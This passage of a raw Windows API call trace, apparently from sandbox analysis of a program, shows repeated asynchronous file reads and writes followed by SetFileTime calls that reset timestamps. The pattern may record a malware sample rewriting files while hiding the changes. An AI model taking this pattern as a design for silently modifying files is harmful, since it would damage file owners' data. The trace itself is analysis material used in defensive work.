[0077.340] CloseHandle (hObject=0x3bc) returned 1 [0077.343] free (_Block=0x206b860) [0077.343] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0077.344] WriteFile (in: hFile=0x3c0, lpBuffer=0x20ebb84*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x20ebb84*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50) returned 1 [0077.344] GetLastError () returned 0x3e5 [0077.344] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0077.565] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0077.566] GetLastError () returned 0x3e5 [0077.566] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0077.575] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0077.575] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0077.575] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.576] free (_Block=0x2060778) [0077.576] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0077.576] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0077.576] free (_Block=0x2062da0) [0077.577] free (_Block=0x53fcc0) [0077.577] free (_Block=0x2062eb8) [0077.577] WriteFile (in: hFile=0x3bc, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0077.577] GetLastError () returned 0x3e5 [0077.577] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0077.648] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x15e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0077.654] GetLastError () returned 0x3e5 [0077.654] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0077.670] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.670] CloseHandle (hObject=0x3b0) returned 1 [0077.675] free (_Block=0x206b860) [0077.675] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0077.685] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0077.685] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0077.685] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.686] free (_Block=0x2060778) [0077.686] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0077.686] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0077.687] free (_Block=0x2062da0) [0077.687] free (_Block=0x53fcc0) [0077.687] free (_Block=0x2062eb8) [0077.688] WriteFile (in: hFile=0x3c0, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0077.688] GetLastError () returned 0x3e5 [0077.688] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0077.713] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0077.713] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0077.713] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.714] free (_Block=0x2060778) [0077.714] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0077.714] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0077.715] free (_Block=0x2062da0) [0077.715] free (_Block=0x53fcc0) [0077.716] free (_Block=0x2062eb8) [0077.716] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0077.716] GetLastError () returned 0x3e5 [0077.716] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0077.737] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.737] CloseHandle (hObject=0x3c0) returned 1 [0077.744] free (_Block=0x20abae0) [0077.744] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0077.775] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0077.775] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0077.775] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.776] free (_Block=0x2060778) [0077.776] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0077.776] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0077.779] free (_Block=0x2062da0) [0077.780] free (_Block=0x53fcc0) [0077.780] free (_Block=0x2062eb8) [0077.780] WriteFile (in: hFile=0x3b4, lpBuffer=0x20ebb84, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x20ebb84, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50) returned 0x0 [0077.781] GetLastError () returned 0x3e5 [0077.782] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0077.829] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.830] CloseHandle (hObject=0x3b0) returned 1 [0077.837] free (_Block=0x206b860) [0077.837] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0077.838] WriteFile (in: hFile=0x3b4, lpBuffer=0x20ebb84*, nNumberOfBytesToWrite=0xf600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x20ebb84*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50) returned 1 [0077.839] GetLastError () returned 0x3e5 [0077.839] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0079.237] SetFileTime (hFile=0x3bc, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0079.237] CloseHandle (hObject=0x3bc) returned 1 [0079.243] free (_Block=0x20abae0) [0079.243] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0079.251] WriteFile (in: hFile=0x3b4, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0079.251] GetLastError () returned 0x3e5 [0079.251] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0079.268] ReadFile (in: hFile=0x3b0, lpBuffer=0x20ebb84, nNumberOfBytesToRead=0xaa00, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x20ebb84*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebb50) returned 1 [0079.270] GetLastError () returned 0x3e5 [0079.270] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0079.270] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0079.271] CloseHandle (hObject=0x3b0) returned 1 [0079.277] free (_Block=0x20ebb50) [0079.279] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0079.425] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0079.426] GetLastError () returned 0x3e5 [0079.426] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0079.427] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0079.427] CloseHandle (hObject=0x3c0) returned 1 [0079.430] free (_Block=0x206b860) [0079.430] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0079.449] ReadFile (in: hFile=0x3bc, lpBuffer=0x206b894, nNumberOfBytesToRead=0x2f600, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0079.467] GetLastError () returned 0x3e5 [0079.467] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0079.474] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0079.474] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0079.474] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0079.474] free (_Block=0x2060778) [0079.474] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0079.474] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0079.475] free (_Block=0x2062da0) [0079.476] free (_Block=0x53fcc0) [0079.476] free (_Block=0x2062eb8) [0079.476] WriteFile (in: hFile=0x3c0, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0079.476] GetLastError () returned 0x3e5 [0079.476] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0079.753] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0079.753] GetLastError () returned 0x3e5 [0079.753] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0079.768] WriteFile (in: hFile=0x3bc, lpBuffer=0x394007c, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 0x0 [0079.768] GetLastError () returned 0x3e5 [0079.768] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0079.791] ReadFile (in: hFile=0x3b0, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0079.792] GetLastError () returned 0x3e5 [0079.792] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0079.800] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0079.800] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0079.800] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0079.801] free (_Block=0x2060778) [0079.801] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0079.801] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0079.802] free (_Block=0x2062da0) [0079.802] free (_Block=0x53fcc0) [0079.802] free (_Block=0x2062eb8) [0079.802] WriteFile (in: hFile=0x3b4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0079.802] GetLastError () returned 0x3e5 [0079.803] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0080.269] WriteFile (in: hFile=0x3b4, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0080.269] GetLastError () returned 0x3e5 [0080.270] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0080.280] WriteFile (in: hFile=0x3b8, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0080.280] GetLastError () returned 0x3e5 [0080.280] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0080.283] WriteFile (in: hFile=0x3c4, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0080.283] GetLastError () returned 0x3e5 [0080.283] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0080.657] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0080.657] GetLastError () returned 0x3e5 [0080.657] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0080.685] WriteFile (in: hFile=0x3b0, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0080.685] GetLastError () returned 0x3e5 [0080.685] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0080.695] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0080.695] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0080.695] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0080.696] free (_Block=0x2060778) [0080.696] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0080.696] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0080.697] free (_Block=0x2062da0) [0080.698] free (_Block=0x53fcc0) [0080.698] free (_Block=0x2062eb8) [0080.698] WriteFile (in: hFile=0x3c0, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0080.699] GetLastError () returned 0x3e5 [0080.699] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0080.704] WriteFile (in: hFile=0x3c0, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0080.705] GetLastError () returned 0x3e5 [0080.705] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0080.978] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0080.979] CloseHandle (hObject=0x3b0) returned 1 [0080.981] free (_Block=0x20abae0) [0080.981] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0080.999] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0080.999] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0080.999] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0081.000] free (_Block=0x2060778) [0081.000] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0081.000] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0081.001] free (_Block=0x2062da0) [0081.001] free (_Block=0x53fcc0) [0081.001] free (_Block=0x2062eb8) [0081.001] WriteFile (in: hFile=0x3b8, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0081.002] GetLastError () returned 0x3e5 [0081.002] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.005] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0081.005] CloseHandle (hObject=0x3c0) returned 1 [0081.008] free (_Block=0x206b860) [0081.008] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.022] SetFileTime (hFile=0x3b8, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0081.022] CloseHandle (hObject=0x3b8) returned 1 [0081.028] free (_Block=0x20abae0) [0081.028] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.035] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0081.035] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0081.035] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0081.036] free (_Block=0x2060778) [0081.036] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0081.036] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0081.037] free (_Block=0x2062da0) [0081.037] free (_Block=0x53fcc0) [0081.038] free (_Block=0x2062eb8) [0081.038] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0081.038] GetLastError () returned 0x3e5 [0081.038] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.050] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0xc60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0081.051] GetLastError () returned 0x3e5 [0081.051] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.061] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0081.061] calloc (_Count=0x41, _Size=0x4) returned 